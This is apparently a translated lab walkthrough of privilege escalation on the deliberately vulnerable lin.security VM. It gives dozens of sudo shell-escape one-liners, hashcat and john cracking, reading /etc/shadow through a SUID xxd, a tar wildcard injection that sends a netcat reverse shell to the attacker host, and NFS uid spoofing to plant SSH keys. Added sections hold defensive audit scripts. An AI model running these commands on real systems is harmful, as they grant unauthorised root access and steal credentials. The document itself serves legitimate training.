Target description: lin.security is a Linux virtual machine from in.security. It is based on what was, at the time of writing, the latest Ubuntu distribution (18.04 LTS), but it contains a number of vulnerabilities that allow a user to escalate privileges to root on the box. It is designed to help understand how some built-in applications and services, if incorrectly configured, can be abused by attackers.
First, you can log in to the host using the following credentials: bob / secret
Download address: https://in.security/downloads/lin.security_v1.0.ova
Environment configuration:
1. The target VM is attached to NAT when first powered on and cannot obtain an IP address. Shut it down, power it on again while holding the Shift key during the first second of boot, then press e to enter the boot entry editor:
Change ro to rw single init=/bin/bash
2. Press Ctrl+X or F10 to boot with the modified entry. After booting, the network interface is ens33:
3. Now change enp0s3 to ens33 in the network configuration, apply the change, and restart:
Since Ubuntu 16.04, a fixed IP can still be configured in /etc/network/interfaces, but most network interfaces are managed through Netplan. The configuration file is /etc/netplan/50-cloud-init.yaml
vim /etc/netplan/50-cloud-init.yaml
netplan apply    # apply the configuration so it takes effect
4. If that does not work, modify the configuration in /etc/network/interfaces:
vim /etc/network/interfaces
Add two new lines:
auto ens33
iface ens33 inet dhcp
1, Information gathering
1. Scan the ports; port 22 is open, so log in remotely with the given account:
nmap -sS -sV -T5 -p- 192.168.225.192
ssh [email protected]
2, sudo privilege escalation
2. The target has many vulnerabilities, so there are many ways to escalate privileges:
1) General method: run sudo -l to list the commands that can be run with root privileges
Many of the listed commands can be used directly for privilege escalation:
sudo ash
sudo bash
sudo /bin/bash
sudo dash
sudo csh
sudo sh
sudo curl
sudo zsh
2) socat privilege escalation:
Start a shell listening on port 1234 on the server:
sudo socat tcp-listen:1234,reuseaddr,fork exec:sh,pty,stderr,setsid,sigint,sane
Open another window with a remote connection and connect to the listener on local port 1234:
socat FILE:`tty`,raw,echo=0 TCP:127.0.0.1:1234
Reference article: https://blog.csdn.net/qq_17204441/article/details/89324620
3) awk privilege escalation:
sudo awk 'BEGIN {system("/bin/sh")}'
4) ed privilege escalation:
The ed command starts the ed text editor. From ed's empty buffer you can call a bash/sh shell to escalate privileges.
sudo ed
!sh
One catch: exit does not leave ed. Use w to save and q to quit.
5) find privilege escalation:
sudo find . -exec /bin/sh \; -quit
6) env privilege escalation:
Some applications call system commands through functions such as system() without using an absolute path, relying instead on env and the environment variables to locate the program, so modifying the environment variables may lead to privilege escalation.
sudo sh -c 'cp $(which env) .; chmod +s ./env'
./env /bin/sh -p
7) less, more and man privilege escalation:
sudo less /etc/passwd
!/bin/sh
sudo more /etc/passwd
!/bin/sh
sudo man man
!/bin/sh
8) expect privilege escalation:
expect is an automation tool for interactive programs: when a command or program prompts for specific input, expect supplies the specified strings so the interaction can be scripted.
sudo expect -c "spawn /bin/sh;interact"
9) scp privilege escalation:
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:
10) ssh privilege escalation:
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
11) vi privilege escalation:
sudo vi -c ':!/bin/sh' /dev/null
12) pico privilege escalation:
sudo pico
^R^X
reset; sh 1>&0 2>&0
How to do this: press Ctrl+R and Ctrl+X on the keyboard, then enter the command above. After it has run, press Ctrl+R and Ctrl+X again and enter the command you want to execute, such as id; it will run with root permission.
13) rvim privilege escalation:
sudo rvim -c ':python3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
14) perl privilege escalation:
sudo perl -e 'exec "/bin/sh";'
15) tclsh privilege escalation:
Tcl is a scripting language, a string-based command language.
sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
16) git privilege escalation:
sudo git -p help config
!/bin/sh
17) script privilege escalation:
sudo script -q /dev/null
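Seen from the defender's side, the list above is an audit checklist. The following added example (not part of the original walkthrough) reads `sudo -l` output and flags every permitted program that this section uses to reach root; the function names and the sample output are constructed for illustration.

```shell
#!/bin/sh
# Programs this walkthrough runs through sudo to obtain root (extend as needed).
ESCAPES="ash bash dash csh sh zsh curl socat awk ed find env less more man expect scp ssh vi pico rvim perl tclsh git script strace"

# audit_sudo_l: read `sudo -l` output on stdin. Print "RISK <path>" for each
# permitted command whose basename is in ESCAPES, "RISK ALL" for a blanket rule.
audit_sudo_l() {
    awk -v list="$ESCAPES" '
        BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) bad[a[i]] = 1 }
        /^[ \t]*\(/ {                            # rule lines start with "(runas)"
            sub(/^[ \t]*\([^)]*\)[ \t]*/, "")    # drop the run-as spec
            gsub(/[A-Z_]+:[ \t]*/, "")           # drop tags such as NOPASSWD:
            n = split($0, cmds, /,[ \t]*/)
            for (i = 1; i <= n; i++) {
                split(cmds[i], w, " ")           # first word is the command path
                if (w[1] == "ALL") { print "RISK ALL"; continue }
                m = split(w[1], p, "/")
                if (p[m] in bad) print "RISK " w[1]
            }
        }'
}

# Constructed sample of `sudo -l` output (not captured from the VM).
sample_sudo_l() {
    cat <<'EOF'
User bob may run the following commands on host:
    (ALL) /bin/ash, /usr/bin/awk, /usr/bin/curl
    (root) NOPASSWD: /usr/bin/find, /sbin/reboot
EOF
}

sample_sudo_l | audit_sudo_l
```

On a real host, pipe `sudo -l -U <user>` into `audit_sudo_l` for each account and remove or tightly constrain every rule it reports.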
3, Password information gathering and privilege escalation
Hash cracking:
1. In /etc/passwd you will find entries such as root:x:0:0:root:/root:/bin/bash. Here the x means that the user's password hash is stored in /etc/shadow
2. Try to crack the password of the insecurity user (the wordlist is /usr/share/wordlists/rockyou.txt on Kali):
hashcat AzER3pBZh6WZE -m 1500 rockyou.txt
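A check for the condition that makes this step possible, as an added example that is not part of the original walkthrough: it scans passwd-format lines for a password field that holds a hash instead of the x placeholder, names the scheme (a 13-character value is descrypt, the format cracked with -m 1500 above), and reports extra uid 0 accounts. The sample lines are constructed; only the hash string is taken from this page.

```shell
#!/bin/sh
# audit_passwd: read passwd(5)-format lines on stdin and report
#   HASH  <user> <scheme>  field 2 holds a hash readable by every local user
#   EMPTY <user>           field 2 is empty (no password required)
#   UID0  <user>           an account other than root has uid 0
audit_passwd() {
    awk -F: '
        NF < 7 || /^#/ { next }
        $2 == "" { print "EMPTY " $1 }
        $2 != "x" && $2 != "*" && $2 != "!" && $2 != "" {
            scheme = "unknown"
            if ($2 ~ /^\$1\$/) scheme = "md5crypt"
            else if ($2 ~ /^\$5\$/) scheme = "sha256crypt"
            else if ($2 ~ /^\$6\$/) scheme = "sha512crypt"
            else if (length($2) == 13 && $2 ~ /^[.\/0-9A-Za-z]+$/) scheme = "descrypt"
            print "HASH " $1 " " scheme
        }
        $3 == 0 && $1 != "root" { print "UID0 " $1 }'
}

# Constructed sample; the account names "demo" and "toor" are hypothetical.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
demo:AzER3pBZh6WZE:1001:1001::/home/demo:/bin/sh
toor:x:0:0::/root:/bin/sh
EOF
}

sample_passwd | audit_passwd
```

Run it as `audit_passwd < /etc/passwd`; any HASH line should be moved to /etc/shadow and the password rotated.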
Cracking with john:
1. List the SUID binaries that could be used for privilege escalation:
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
xxd privilege escalation:
The xxd command produces a hex dump of standard input or a given file, and it can also convert a hex dump back to the original binary format. When xxd has the SUID bit set together with execute permission, it can be used for privilege escalation
1. First check the group information; user susan belongs to the itservices group:
cat /etc/group | grep itservices
2. Use the super user to list the hidden files, find the secret file under susan's account, and read it to get the password:
find / -name ".*" -type f -path "/home/*" -exec ls -al {} \;
3. Log in to the susan account with the password MySuperS3cretValue! and use the xxd command to read the /etc/shadow file:
xxd "/etc/shadow" | xxd -r
4. Copy the users and password hashes into a file, and use john to crack the passwords:
john --wordlist=/usr/share/wordlists/rockyou.txt pass
taskset privilege escalation:
taskset 1 /bin/bash -p
4, Scheduled task (cron) privilege escalation:
1. Generate a reverse shell payload on Kali:
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.225.133 lport=1234 R
2. Write the payload to the sh file of the scheduled task:
echo "mkfifo /tmp/jagoff; nc 192.168.225.133 1234 0</tmp/jagoff | /bin/sh >/tmp/jagoff 2>&1; rm /tmp/jagoff" > shell.sh && chmod +x shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"    # inject a flag that specifies the checkpoint action
echo "" > --checkpoint=1    # inject a flag that specifies the checkpoint
3. Open another window, log in remotely again, and listen; the reverse shell connects back successfully
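The step above works because a root job expands a shell wildcard in a directory other users can write to, so file names beginning with "-" reach the program as options (the two checkpoint names are GNU tar options). The added example below, which is not part of the original walkthrough, finds such names and compares how many option-like arguments `*` and `./*` produce; the function names and the sample directory are constructed.

```shell
#!/bin/sh
# find_option_names DIR: print entries directly inside DIR whose names start
# with "-" and would be parsed as options after wildcard expansion.
find_option_names() {
    for f in "$1"/-*; do
        [ -e "$f" ] || [ -L "$f" ] || continue    # glob matched nothing
        printf '%s\n' "${f##*/}"
    done
}

# count_dash_args DIR PATTERN: expand PATTERN inside DIR the way a job's
# command line would, and count the resulting words that begin with "-".
count_dash_args() (
    cd "$1" || exit 1
    n=0
    for a in $2; do                               # unquoted on purpose: glob expansion
        case $a in -*) n=$((n + 1)) ;; esac
    done
    echo "$n"
)

# Constructed sample directory: empty files carrying the names used above.
make_sample_dir() {
    d=$(mktemp -d) || return 1
    : > "$d/report.txt"
    : > "$d/--checkpoint=1"
    : > "$d/--checkpoint-action=exec=sh shell.sh"
    printf '%s\n' "$d"
}

dir=$(make_sample_dir)
find_option_names "$dir"
echo "pattern *   -> $(count_dash_args "$dir" '*') option-like arguments"
echo "pattern ./* -> $(count_dash_args "$dir" './*') option-like arguments"
rm -rf "$dir"
```

Writing the job's wildcard as `./*`, or placing `--` before it, keeps these names from being read as options; the job should also not run as root in a directory other users can write to.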
5, NFS privilege escalation:
1. The port scan shows that the NFS port, 2049, is open. View the exported directories:
showmount -e 192.168.225.192
2. Mount:
mount -t nfs 192.168.225.192:/home/peter /tmp/
As root you can browse the mounted directory directly, but you cannot copy files into the network share.
3. The principle: mount the NFS share on Kali, create a new user with the same uid/gid as the export (1001 / 1005), and then switch to that user to write files into the export
groupadd -g 1005 peter
adduser peter --uid 1001 --gid 1005
ls -al /tmp
4. Switch to the peter user and create an SSH key for connecting to /home/peter on lin.security:
ssh-keygen
5. Because the share is writable, copy the contents of id_rsa.pub to authorized_keys and put it in the mounted directory, with permissions 644 or 600
cat id_rsa.pub > /tmp/authorized_keys
chmod 700 ../.ssh/
chmod 600 authorized_keys
6. Remote connection:
ssh -i id_rsa [email protected]
7. After connecting successfully, escalate privileges with strace:
strace traces the system calls made by a process, including their arguments, return values and execution time.
sudo strace -o /dev/null /bin/sh
Or escalate through docker group membership:
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
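The NFS step in section 5 succeeds because the server accepts whatever uid/gid the client presents, so a writable home-directory export is writable by anyone who can create a matching local user. The added example below (not part of the original walkthrough) audits exports(5) lines for that exposure; the finding labels and the sample file are constructed and do not reproduce the VM's actual /etc/exports.

```shell
#!/bin/sh
# audit_exports: read exports(5) lines on stdin; print one finding per
# path/client pair:
#   NO_ROOT_SQUASH  client root keeps uid 0 on the export
#   RW_WIDE         writable for any host or a whole subnet, ids not squashed
#   RW_HOME         a home directory is writable over NFS, ids not squashed
audit_exports() {
    awk '
        /^[ \t]*(#|$)/ { next }
        {
            path = $1
            for (i = 2; i <= NF; i++) {
                client = $i; opts = ""
                if ((p = index($i, "(")) > 0) {
                    client = substr($i, 1, p - 1)
                    opts = "," substr($i, p + 1, length($i) - p - 1) ","
                }
                if (client == "") client = "*"
                if (opts ~ /,no_root_squash,/) print "NO_ROOT_SQUASH " path " " client
                if (opts ~ /,rw,/ && opts !~ /,all_squash,/) {
                    if (client == "*" || client ~ /\//) print "RW_WIDE " path " " client
                    if (path ~ /^\/home(\/|$)/) print "RW_HOME " path " " client
                }
            }
        }'
}

# Constructed sample exports file.
sample_exports() {
    cat <<'EOF'
# constructed sample
/home/peter *(rw,sync,no_subtree_check)
/srv/pub 192.168.225.0/24(ro,all_squash)
/backup 10.0.0.5(rw,no_root_squash)
EOF
}

sample_exports | audit_exports
```

Run it as `audit_exports < /etc/exports`; for each finding, restrict the client list, export read-only, or add all_squash.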